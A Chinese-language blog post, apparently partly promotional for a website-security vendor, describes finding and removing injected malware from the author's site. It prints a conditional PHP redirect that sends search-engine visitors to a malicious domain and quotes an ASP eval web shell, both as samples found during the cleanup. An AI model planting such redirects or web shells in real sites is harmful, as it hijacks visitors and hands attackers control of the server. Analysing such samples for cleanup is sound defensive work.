放假期間網站被掛馬的解決辦法

青島峰會期間本來想給自己放幾天假的，因為網站的掛馬給泡湯了，開啟網站首頁，使用瀏覽器的原始碼功能，發現自己網站的首頁多了很多木馬程式碼，於是我連線FTP檢視網站首頁的程式碼中發現了這個掛馬程式碼，下面我把程式碼貼出來 ：

<?phperror_reporting(0);if(eregi(`google|soso|sogou|baidu`,$_SERVER[`HTTP_REFERER`]) ){ echo `<>window.location.href=”http://www.”+”tao”+”8s”+”.in”+”fo”;</>`;}

惡意的掛馬網址 www.tao8s.info

解釋一下：這個程式碼是 PHP的程式碼是一種條件性的掛馬，上面的google soso sogou baidu 都是掛馬的條件，意思就是當從 google soso…等等搜尋引擎來的訪問客戶會自動在網頁上隱藏一行程式碼也就是掛馬程式碼。

訪問這個網站的使用者，一般都會被360和百度提示網站有風險和網站掛馬提示的，但是這個掛馬為什麼不提示呢? 這裡我給大家解密下，不要以為病毒都會被防毒軟體殺掉，防毒軟體也不是萬能的，就像警察抓小偷，警察不知道小偷的特徵怎麼去抓捕呢？ 防毒和這個道理一樣的是根據特徵來的，有一些病毒出來的早，沒有被防毒跟蹤到，所以360和百度也不會有什麼安全掛馬提示（一般業界人士稱“免殺病毒”。

說的有點多，言歸正傳。說點乾貨，那遇到這種情況咋辦啊，我的解決辦法就是先查清楚病因後除根，於是用FTP把網站程式全部打包下來然後一個一個檔案的檢查，看看有沒有其他名字的檔案，我在網上查到一般木馬檔名字都是global.asa global.asp 啥的，反正是些不熟悉的檔名，檢查了一下沒有發現特殊的檔名字，於是開始檢查程式碼方面，都知道程式設計師寫程式碼能累死，於是在百度上查到了一個叫sinesafe的網站掛馬程式碼檢查工具，這個工具是專門檢查掛馬程式碼的和木馬程式碼的。我把網站程式的程式碼檔案放到工具檢測了一下，發現了木馬程式碼 <%eval request(“hack”)%> eval的特徵程式碼，找到這個程式碼後我就給刪除了，重複的用掛馬檢測工具檢查了好幾遍，沒有發現問題後，我這才放心。連線到FTP，把網站程式重新上傳了一遍，網站這才穩定下來。

折騰了我一天，連午睡都沒撈著睡，困死我了。以上就是我網站被掛馬後的解決經歷，有什麼不懂的也隨時歡迎大家與我交流探討。

專注於安全領域 解決網站安全 解決網站被黑 網站被掛馬 網站被篡改
網站安全、伺服器安全提供商-www.sinesafe.com –專門解決其他人解決不了的網站安全問題.